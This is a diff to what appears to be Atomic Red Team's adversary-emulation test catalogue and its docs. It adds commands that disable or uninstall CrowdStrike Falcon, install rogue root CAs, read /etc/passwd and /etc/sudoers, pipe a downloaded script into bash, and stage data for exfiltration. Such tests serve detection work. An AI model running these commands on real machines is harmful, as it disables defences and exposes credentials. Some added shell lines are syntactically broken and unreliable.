+        name: sh
+        elevation_required: true
+        command: |
+          sudo systemctl stop falcon-sensor.service
+          sudo systemctl disable falcon-sensor.service
+        cleanup_command: |
+          sudo systemctl enable falcon-sensor.service
+          sudo systemctl start falcon-sensor.service
    - name: Disable Carbon Black Response
      description: 'Disables Carbon Black Response

@@ -7432,6 +7447,28 @@ defense-evasion:
        command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist

 '
+    - name: Stop and unload Crowdstrike Falcon on macOS
+      description: 'Stop and unload Crowdstrike Falcon daemons falcond and userdaemon
+        on macOS
+
+'
+      supported_platforms:
+      - macos
+      input_arguments:
+        falcond_plist:
+          description: The path of the Crowdstrike Falcon plist file
+          type: path
+          default: "/Library/LaunchDaemons/com.crowdstrike.falcond.plist"
+        userdaemon_plist:
+          description: The path of the Crowdstrike Userdaemon plist file
+          type: path
+          default: "/Library/LaunchDaemons/com.crowdstrike.userdaemon.plist"
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          sudo launchctl unload #{falcond_plist}
+          sudo launchctl unload #{userdaemon_plist}
    - name: Unload Sysmon Filter Driver
      description: |
        Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution,
@@ -7700,9 +7737,31 @@ defense-evasion:
      executor:
        name: powershell
        elevation_required: true
-        command: |-
+        command: |
          Stop-Service -Name #{service_name}
          Remove-Service -Name #{service_name}
+    - name: Uninstall Crowdstrike Falcon on Windows
+      description: 'Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is
+        not provided as an argument we need to search for it. Since the executable
+        is located in a folder named with a random guid we need to identify it before
+        invoking the uninstaller.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        falcond_path:
+          description: The Crowdstrike Windows Sensor path. The Guid always changes.
+          type: path
+          default: C:\ProgramData\Package Cache\{7489ba93-b668-447f-8401-7e57a6fe538d}\WindowsSensor.exe
+      executor:
+        name: powershell
+        elevation_required: true
+        command: if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall
+          /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include
+          "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath
+          $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList
+          -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}}
  T1107:
    technique:
      x_mitre_data_sources:
@@ -9416,7 +9475,7 @@ defense-evasion:
        name: sh
        command: |
          openssl genrsa -out #{key_filename} 4096
-          openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -out #{cert_filename}
+          openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}

          if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -le "5" ];
          then
@@ -9425,6 +9484,93 @@ defense-evasion:
            cp rootCA.crt /etc/pki/ca-trust/source/anchors/
            update-ca-trust
          fi
+    - name: Install root CA on Debian/Ubuntu
+      description: 'Creates a root CA with openssl
+
+'
+      supported_platforms:
+      - linux
+      input_arguments:
+        key_filename:
+          description: Key we create that is used to create the CA certificate
+          type: Path
+          default: rootCA.key
+        cert_filename:
+          description: CA file name
+          type: Path
+          default: rootCA.crt
+      dependency_executor_name: command_prompt
+      dependencies:
+      - description: Verify the certificate exists. It generates if not on disk.
+        prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;'
+        get_prereq_command: |-
+          if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
+          openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          mv #{cert_filename} /usr/local/share/ca-certificates
+          echo sudo update-ca-certificates
+    - name: Install root CA on macOS
+      description: 'Creates a root CA with openssl
+
+'
+      supported_platforms:
+      - macos
+      input_arguments:
+        key_filename:
+          description: Key we create that is used to create the CA certificate
+          type: Path
+          default: rootCA.key
+        cert_filename:
+          description: CA file name
+          type: Path
+          default: rootCA.crt
+      dependency_executor_name: command_prompt
+      dependencies:
+      - description: Verify the certificate exists. It generates if not on disk.
+        prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;'
+        get_prereq_command: |-
+          if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
+          openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: 'sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain"
+          "#{cert_filename}"
+
+'
+    - name: Install root CA on Windows
+      description: 'Creates a root CA with Powershell
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        pfx_path:
+          description: Path of the certificate
+          type: Path
+          default: rootCA.cer
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Verify the certificate exists. It generates if not on disk.
+        prereq_command: 'if (Test-Path #{cert_filename}) { exit 0 } else { exit 1
+          }'
+        get_prereq_command: |-
+          $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
+          Export-Certificate -Type CERT -Cert  Cert:\LocalMachine\My\$cert.Thumbprint -FilePath #{pfx_path}
+          Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: |
+          $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
+          Move-Item -Path $cert.PSPath -Destination "Cert:\LocalMachine\Root"
+        cleanup_command: |
+          $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
+          Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
+          Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) | Remove-Item
  T1118:
    technique:
      x_mitre_data_sources:
@@ -17493,10 +17639,13 @@ discovery:
        output_file:
          description: Path where captured results will be placed
          type: Path
-          default: "~/loot.txt"
+          default: "/tmp/T1087.txt"
      executor:
        name: sh
-        command: 'cat /etc/passwd > #{output_file}
+        command: |
+          cat /etc/passwd > #{output_file}
+          cat #{output_file}
+        cleanup_command: 'rm -f #{output_file}

 '
    - name: View sudoers access
@@ -17508,10 +17657,14 @@ discovery:
        output_file:
          description: Path where captured results will be placed
          type: Path
-          default: "~/loot.txt"
+          default: "/tmp/T1087.txt"
      executor:
        name: sh
-        command: 'cat /etc/sudoers > #{output_file}
+        elevation_required: true
+        command: |
+          cat /etc/sudoers > #{output_file}
+          cat #{output_file}
+        cleanup_command: 'rm -f #{output_file}

 '
    - name: View accounts with UID 0
@@ -17525,10 +17678,13 @@ discovery:
        output_file:
          description: Path where captured results will be placed
          type: Path
-          default: "~/loot.txt"
+          default: "/tmp/T1087.txt"
      executor:
        name: sh
-        command: 'grep ''x:0:'' /etc/passwd > #{output_file}
+        command: |
+          grep 'x:0:' /etc/passwd > #{output_file}
+          cat #{output_file} 2>/dev/null
+        cleanup_command: 'rm -f #{output_file} 2>/dev/null

 '
    - name: List opened files by user
@@ -17553,10 +17709,20 @@ discovery:
        output_file:
          description: Path where captured results will be placed
          type: Path
-          default: "~/loot.txt"
+          default: "/tmp/T1087.txt"
+      dependency_executor_name: sh
+      dependencies:
+      - description: Check if lastlog command exists on the machine
+        prereq_command: if [ -x "$(command -v lastlog)" ]; then exit 0; else exit
+          1;
+        get_prereq_command: echo "Install lastlog on the machine to run the test.";
+          exit 1;
      executor:
        name: sh
-        command: 'lastlog > #{output_file}
+        command: |
+          lastlog > #{output_file}
+          cat #{output_file}
+        cleanup_command: 'rm -f #{output_file}

 '
    - name: Enumerate users and groups
@@ -17768,10 +17934,17 @@ discovery:
 '
      supported_platforms:
      - linux
+      input_arguments:
+        output_file:
+          description: Path where captured results will be placed.
+          type: Path
+          default: "/tmp/T1217-Firefox.txt"
      executor:
        name: sh
-        command: 'find / -path "*.mozilla/firefox/*/places.sqlite" -exec echo {} >>
-          /tmp/firefox-bookmarks.txt \;
+        command: |
+          find / -path "*.mozilla/firefox/*/places.sqlite" 2>/dev/null -exec echo {} >> #{output_file} \;
+          cat #{output_file} 2>/dev/null
+        cleanup_command: 'rm -f #{output_file} 2>/dev/null

 '
    - name: List Mozilla Firefox Bookmark Database Files on macOS
@@ -17781,10 +17954,17 @@ discovery:
 '
      supported_platforms:
      - macos
+      input_arguments:
+        output_file:
+          description: Path where captured results will be placed.
+          type: Path
+          default: "/tmp/T1217_Firefox.txt"
      executor:
        name: sh
-        command: 'find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {}
-          >> /tmp/firefox-bookmarks.txt \;
+        command: |
+          find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} >> #{output_file} \;
+          cat #{output_file} 2>/dev/null
+        cleanup_command: 'rm -f #{output_file} 2>/dev/null

 '
    - name: List Google Chrome Bookmark JSON Files on macOS
@@ -17794,10 +17974,17 @@ discovery:
 '
      supported_platforms:
      - macos
+      input_arguments:
+        output_file:
+          description: Path where captured results will be placed.
+          type: Path
+          default: "/tmp/T1217-Chrome.txt"
      executor:
        name: sh
-        command: 'find / -path "*/Google/Chrome/*/Bookmarks" -exec echo {} >> /tmp/chrome-bookmarks.txt
-          \;
+        command: |
+          find / -path "*/Google/Chrome/*/Bookmarks" -exec echo {} >> #{output_file} \;
+          cat #{output_file} 2>/dev/null
+        cleanup_command: 'rm -f #{output_file} 2>/dev/null

 '
    - name: List Google Chrome Bookmarks on Windows with powershell
@@ -18150,16 +18337,25 @@ discovery:
      supported_platforms:
      - macos
      - linux
+      input_arguments:
+        output_file:
+          description: Output file used to store the results.
+          type: path
+          default: "/tmp/T1083.txt"
      executor:
        name: sh
        command: |
-          ls -a > allcontents.txt
-          ls -la /Library/Preferences/ > detailedprefsinfo.txt
-          file */* *>> ../files.txt
+          ls -a >> #{output_file}
+          if [ -d /Library/Preferences/ ]; then ls -la /Library/Preferences/ > #{output_file}; fi;
+          file */* *>> #{output_file}
+          cat #{output_file} 2>/dev/null
          find . -type f
          ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e 's/^/ /' -e 's/-/|/'
          locate *
          which sh
+        cleanup_command: 'rm #{output_file}
+
+'
    - name: Nix File and Directory Discovery 2
      description: 'Find or discover files on the file system

@@ -18167,13 +18363,20 @@ discovery:
      supported_platforms:
      - macos
      - linux
+      input_arguments:
+        output_file:
+          description: Output file used to store the results.
+          type: path
+          default: "/tmp/T1083.txt"
      executor:
        name: sh
        command: |
-          cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/loot.txt
-          cat /etc/mtab > /tmp/loot.txt
-          find . -type f -iname *.pdf > /tmp/loot.txt
+          cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > #{output_file}
+          if [ -f /etc/mtab ]; then cat /etc/mtab >> #{output_file}; fi;
+          find . -type f -iname *.pdf >> #{output_file}
+          cat #{output_file}; fi;
          find . -type f -name ".*"
+        cleanup_command: 'rm #{output_file}'
  T1046:
    technique:
      x_mitre_permissions_required:
@@ -18265,6 +18468,12 @@ discovery:
          description: Host to scan.
          type: string
          default: 192.168.1.1
+      dependency_executor_name: sh
+      dependencies:
+      - description: Check if nmap command exists on the machine
+        prereq_command: if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1;
+        get_prereq_command: echo "Install nmap on the machine to run the test."; exit
+          1;
      executor:
        name: sh
        command: |
@@ -18772,9 +18981,9 @@ discovery:
      executor:
        name: sh
        command: |
-          dscacheutil -q group
-          dscl . -list /Groups
-          groups
+          if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi; fi;
+          if [ -x "$(command -v dscl)" ]; then dscl . -list /Groups; else echo "dscl is missing from the machine. skipping..."; fi;
+          if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from the machine. skipping..."; fi;
    - name: Basic Permission Groups Discovery Windows
      description: |
        Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
@@ -19134,6 +19343,11 @@ discovery:
      supported_platforms:
      - linux
      - macos
+      dependency_executor_name: sh
+      dependencies:
+      - description: Check if arp command exists on the machine
+        prereq_command: if [ -x "$(command -v arp)" ]; then exit 0; else exit 1;
+        get_prereq_command: echo "Install arp on the machine."; exit 1;
      executor:
        name: sh
        elevation_required: false
@@ -19147,11 +19361,24 @@ discovery:
      supported_platforms:
      - linux
      - macos
+      input_arguments:
+        subnet:
+          description: Subnet used for ping sweep.
+          type: string
+          default: 192.168.1
+        start_host:
+          description: Subnet used for ping sweep.
+          type: string
+          default: 1
+        stop_host:
+          description: Subnet used for ping sweep.
+          type: string
+          default: 254
      executor:
        name: sh
        elevation_required: false
-        command: 'for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ]
-          && echo "192.168.1.$ip UP" || : ; done
+        command: 'for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip;
+          [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done

 '
    - name: Remote System Discovery - nslookup
@@ -19452,12 +19679,10 @@ discovery:

 '
      supported_platforms:
-      - linux
      - macos
      executor:
        name: sh
        command: |
-          systemsetup
          system_profiler
          ls -al /Applications
    - name: List OS Information
@@ -19467,14 +19692,21 @@ discovery:
      supported_platforms:
      - linux
      - macos
+      input_arguments:
+        output_file:
+          description: Output file used to store the results.
+          type: path
+          default: "/tmp/T1082.txt"
      executor:
        name: sh
-        command: |
-          uname -a >> /tmp/loot.txt
-          cat /etc/lsb-release >> /tmp/loot.txt
-          cat /etc/redhat-release >> /tmp/loot.txt
-          uptime >> /tmp/loot.txt
-          cat /etc/issue >> /tmp/loot.txt
+        command: "uname -a >> #{output_file}\nif [ -f /etc/lsb-release ]; then cat
+          /etc/lsb-release >> #{output_file}; fi;\nif [ -f /etc/redhat-release ];
+          then cat /etc/redhat-release >> #{output_file}; fi;      \nif [ -f /etc/issue
+          ]; then cat /etc/issue >> #{output_file}; fi;\nuptime >> #{output_file}\ncat
+          #{output_file} 2>/dev/null\n"
+        cleanup_command: 'rm #{output_file} 2>/dev/null
+
+'
    - name: Linux VM Check via Hardware
      description: 'Identify virtual machine hardware. This technique is used by the
        Pupy RAT and other malware.
@@ -19485,14 +19717,14 @@ discovery:
      executor:
        name: bash
        command: |
-          cat /sys/class/dmi/id/bios_version | grep -i amazon
-          cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"
-          cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"
-          sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu"
-          cat /proc/scsi/scsi | grep -i "vmware\|vbox"
-          cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual"
-          sudo lspci | grep -i "vmware\|virtualbox"
-          sudo lscpu | grep -i "Xen\|KVM\|Microsoft"
+          if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi;
+          if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"; fi;
+          if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"; fi;
+          if [ -x "$(command -v dmidecode)" ]; then sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu"; fi;
+          if [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i "vmware\|vbox"; fi;
+          if [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual"; fi;
+          if [ -x "$(command -v lspci)" ]; then sudo lspci | grep -i "vmware\|virtualbox"
+          if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft"
    - name: Linux VM Check via Kernel Modules
      description: 'Identify virtual machine guest kernel modules. This technique
        is used by the Pupy RAT and other malware.
@@ -19588,7 +19820,7 @@ discovery:
      modified: '2019-08-12T19:44:26.156Z'
      identifier: T1016
    atomic_tests:
-    - name: System Network Configuration Discovery
+    - name: System Network Configuration Discovery on Windows
      description: |
        Identify network configuration information

@@ -19629,9 +19861,10 @@ discovery:
        name: sh
        elevation_required: false
        command: |
-          arp -a
-          netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c
-          ifconfig
+          if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
+          if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi;
+          if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi;
+          if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;
    - name: System Network Configuration Discovery (TrickBot Style)
      description: |
        Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/
@@ -19796,6 +20029,12 @@ discovery:
      supported_platforms:
      - linux
      - macos
+      dependency_executor_name: sh
+      dependencies:
+      - description: Check if netstat command exists on the machine
+        prereq_command: if [ -x "$(command -v netstat)" ]; then exit 0; else exit
+          1;
+        get_prereq_command: echo "Install netstat on the machine."; exit 1;
      executor:
        name: sh
        elevation_required: false
@@ -28117,10 +28356,15 @@ collection:
      supported_platforms:
      - linux
      - macos
+      input_arguments:
+        output_file:
+          description: Location to save downloaded discovery.bat file
+          type: Path
+          default: "/tmp/T1074_discovery.log"
      executor:
        name: bash
        command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.sh
-          | bash -s > /tmp/discovery.log
+          | bash -s > #{output_file}

 '
    - name: Zip a Folder with PowerShell for Staging in Temp
@@ -28508,12 +28752,15 @@ collection:
        output_file:
          description: Output file path
          type: Path
-          default: desktop.png
+          default: "/tmp/T1113_desktop.png"
      executor:
        name: bash
        elevation_required: false
        command: 'screencapture #{output_file}

+'
+        cleanup_command: 'rm #{output_file}
+
 '
    - name: Screencapture (silent)
      description: 'Use screencapture command to collect a full desktop screenshot
@@ -28525,12 +28772,15 @@ collection:
        output_file:
          description: Output file path
          type: Path
-          default: desktop.png
+          default: "/tmp/T1113_desktop.png"
      executor:
        name: bash
        elevation_required: false
        command: 'screencapture -x #{output_file}

+'
+        cleanup_command: 'rm #{output_file}
+
 '
    - name: X Windows Capture
      description: 'Use xwd command to collect a full desktop screenshot and review
@@ -28543,12 +28793,15 @@ collection:
        output_file:
          description: Output file path
          type: Path
-          default: desktop.xwd
+          default: "/tmp/T1113_desktop.xwd"
      executor:
        name: bash
        command: |
          xwd -root -out #{output_file}
          xwud -in #{output_file}
+        cleanup_command: 'rm #{output_file}
+
+'
    - name: Import
      description: 'Use import command to collect a full desktop screenshot

@@ -28559,11 +28812,14 @@ collection:
        output_file:
          description: Output file path
          type: Path
-          default: desktop.png
+          default: "/tmp/T1113_desktop.png"
      executor:
        name: bash
        command: 'import -window root #{output_file}

+'
+        cleanup_command: 'rm #{output_file}
+
 '
 exfiltration:
  '':
@@ -28888,21 +29144,35 @@ exfiltration:
      supported_platforms:
      - macos
      - linux
+      input_arguments:
+        test_folder:
+          description: Path used to store files.
+          type: Path
+          default: "/tmp/T1022"
+        test_file:
+          description: Temp file used to store encrypted data.
+          type: Path
+          default: T1022
+        encryption_password:
+          description: Password used to encrypt data.
+          type: string
+          default: InsertPasswordHere
+      dependency_executor_name: sh
+      dependencies:
+      - description: gpg and zip are required to run the test.
+        prereq_command: if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)"
+          ]; then exit 1; fi;
+        get_prereq_command: echo "Install gpg and zip to run the test"; exit 1;
      executor:
        name: sh
        elevation_required: false
-        prereq_command: which gpg
        command: |
-          mkdir /tmp/victim-files
-          cd /tmp/victim-files
-          touch a b c d e f g
-          echo "creating zip with password 'insert password here'"
-          zip --password "insert password here" ./victim-files.zip ./*
-          echo "encrypting file with gpg, you will need to provide a password"
-          gpg -c /tmp/victim-files/victim-filex.zip
-          #<enter passphrase and confirm>
-          ls -l
-        cleanup_command: 'rm -Rf /tmp/victim-files
+          mkdir -p #{test_folder}
+          cd #{test_folder}; touch a b c d e f g
+          zip --password "#{encryption_password}" #{test_folder}/#{test_file} ./*
+          echo "#{encryption_password}" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip
+          ls -l #{test_folder}
+        cleanup_command: 'rm -Rf #{test_folder}

 '
    - name: Compress Data and lock with password for Exfiltration with winrar
@@ -29026,14 +29296,33 @@ exfiltration:
      supported_platforms:
      - macos
      - linux
+      input_arguments:
+        folder_path:
+          description: Path where the test creates artifacts
+          type: Path
+          default: "/tmp/T1030"
+        file_name:
+          description: File name
+          type: Path
+          default: T1030_urandom
+      dependency_executor_name: sh
+      dependencies:
+      - description: The file must exist for the test to run.
+        prereq_command: 'if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else
+          exit 0; fi;'
+        get_prereq_command: "if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path};
+          touch #{folder_path}/safe_to_delete; fi;      \ndd if=/dev/urandom of=#{folder_path}/#{file_name}
+          bs=25000000 count=1"
      executor:
        name: sh
        elevation_required: false
        command: |
-          cd /tmp/
-          dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1
-          split -b 5000000 /tmp/victim-whole-file
-          ls -l
+          cd #{folder_path}; split -b 5000000 #{file_name}
+          ls -l #{folder_path}
+        cleanup_command: 'if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path};
+          fi;
+
+'
  T1048:
    technique:
      x_mitre_data_sources:
@@ -6,7 +6,7 @@ Adversaries may use the information from [System Network Configuration Discovery

 ## Atomic Tests

- [Atomic Test #1 - System Network Configuration Discovery](#atomic-test-1---system-network-configuration-discovery)
+- [Atomic Test #1 - System Network Configuration Discovery on Windows](#atomic-test-1---system-network-configuration-discovery-on-windows)

 - [Atomic Test #2 - List Windows Firewall Rules](#atomic-test-2---list-windows-firewall-rules)

@@ -19,7 +19,7 @@ Adversaries may use the information from [System Network Configuration Discovery

 <br/>

-## Atomic Test #1 - System Network Configuration Discovery
+## Atomic Test #1 - System Network Configuration Discovery on Windows
 Identify network configuration information

 Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout.
@@ -90,9 +90,10 @@ Upon successful execution, sh will spawn multiple commands and output will be vi


 ```sh
-arp -a
-netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c
-ifconfig
+if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
+if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi;
+if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi;
+if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;
 ```


@@ -197,6 +197,18 @@ arp -a | grep -v '^?'



+#### Dependencies:  Run with `sh`!
+##### Description: Check if arp command exists on the machine
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; 
+```
+##### Get Prereq Commands:
+```sh
+echo "Install arp on the machine."; exit 1;
+```
+
+


 <br/>
@@ -212,12 +224,19 @@ Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 an



+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| subnet | Subnet used for ping sweep. | string | 192.168.1|
+| start_host | Subnet used for ping sweep. | string | 1|
+| stop_host | Subnet used for ping sweep. | string | 254|
+

 #### Attack Commands: Run with `sh`! 


 ```sh
-for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
+for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done
 ```


@@ -25,29 +25,44 @@ Encrypt data for exiltration



+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| test_folder | Path used to store files. | Path | /tmp/T1022|
+| test_file | Temp file used to store encrypted data. | Path | T1022|
+| encryption_password | Password used to encrypt data. | string | InsertPasswordHere|
+

 #### Attack Commands: Run with `sh`! 


 ```sh
-mkdir /tmp/victim-files
-cd /tmp/victim-files
-touch a b c d e f g
-echo "creating zip with password 'insert password here'"
-zip --password "insert password here" ./victim-files.zip ./*
-echo "encrypting file with gpg, you will need to provide a password"
-gpg -c /tmp/victim-files/victim-filex.zip
-#<enter passphrase and confirm>
-ls -l
+mkdir -p #{test_folder}
+cd #{test_folder}; touch a b c d e f g
+zip --password "#{encryption_password}" #{test_folder}/#{test_file} ./*
+echo "#{encryption_password}" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip
+ls -l #{test_folder}
 ```

 #### Cleanup Commands:
 ```sh
-rm -Rf /tmp/victim-files
+rm -Rf #{test_folder}
 ```



+#### Dependencies:  Run with `sh`!
+##### Description: 
+##### Check Prereq Commands:
+```sh
+if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; 
+```
+##### Get Prereq Commands:
+```sh
+echo "Install gpg and zip to run the test"; exit 1;
+```
+
+


 <br/>
@@ -17,20 +17,41 @@ Take a file/directory, split it into 5Mb chunks



+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| folder_path | Path where the test creates artifacts | Path | /tmp/T1030|
+| file_name | File name | Path | T1030_urandom|
+

 #### Attack Commands: Run with `sh`! 


 ```sh
-cd /tmp/
-dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1
-split -b 5000000 /tmp/victim-whole-file
-ls -l
+cd #{folder_path}; split -b 5000000 #{file_name}
+ls -l #{folder_path}
+```
+
+#### Cleanup Commands:
+```sh
+if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: 
+##### Check Prereq Commands:
+```sh
+if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi; 
+```
+##### Get Prereq Commands:
+```sh
+if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/safe_to_delete; fi;      
+dd if=/dev/urandom of=#{folder_path}/#{file_name} bs=25000000 count=1
 ```




-
-
 <br/>
@@ -72,6 +72,18 @@ nc -nv #{host} #{port}



+#### Dependencies:  Run with `sh`!
+##### Description: Check if nmap command exists on the machine
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; 
+```
+##### Get Prereq Commands:
+```sh
+echo "Install nmap on the machine to run the test."; exit 1;
+```
+
+


 <br/>
@@ -99,6 +99,18 @@ who -a



+#### Dependencies:  Run with `sh`!
+##### Description: Check if netstat command exists on the machine
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; 
+```
+##### Get Prereq Commands:
+```sh
+echo "Install netstat on the machine."; exit 1;
+```
+
+


 <br/>
@@ -46,9 +46,9 @@ Permission Groups Discovery


 ```sh
-dscacheutil -q group
-dscl . -list /Groups
-groups
+if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi; fi;
+if [ -x "$(command -v dscl)" ]; then dscl . -list /Groups; else echo "dscl is missing from the machine. skipping..."; fi;
+if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from the machine. skipping..."; fi;
 ```


@@ -57,12 +57,17 @@ Utilize curl to download discovery.sh and execute a basic information gathering



+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| output_file | Location to save downloaded discovery.bat file | Path | /tmp/T1074_discovery.log|
+

 #### Attack Commands: Run with `bash`! 


 ```bash
-curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.sh | bash -s > /tmp/discovery.log
+curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.sh | bash -s > #{output_file}
 ```


@@ -71,7 +71,7 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
 ## Atomic Test #2 - System Information Discovery
 Identify System Info

-**Supported Platforms:** Linux, macOS
+**Supported Platforms:** macOS



@@ -81,7 +81,6 @@ Identify System Info


 ```sh
-systemsetup
 system_profiler
 ls -al /Applications
 ```
@@ -102,18 +101,28 @@ Identify System Info



+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| output_file | Output file used to store the results. | path | /tmp/T1082.txt|
+

 #### Attack Commands: Run with `sh`! 


 ```sh
-uname -a >> /tmp/loot.txt
-cat /etc/lsb-release >> /tmp/loot.txt
-cat /etc/redhat-release >> /tmp/loot.txt
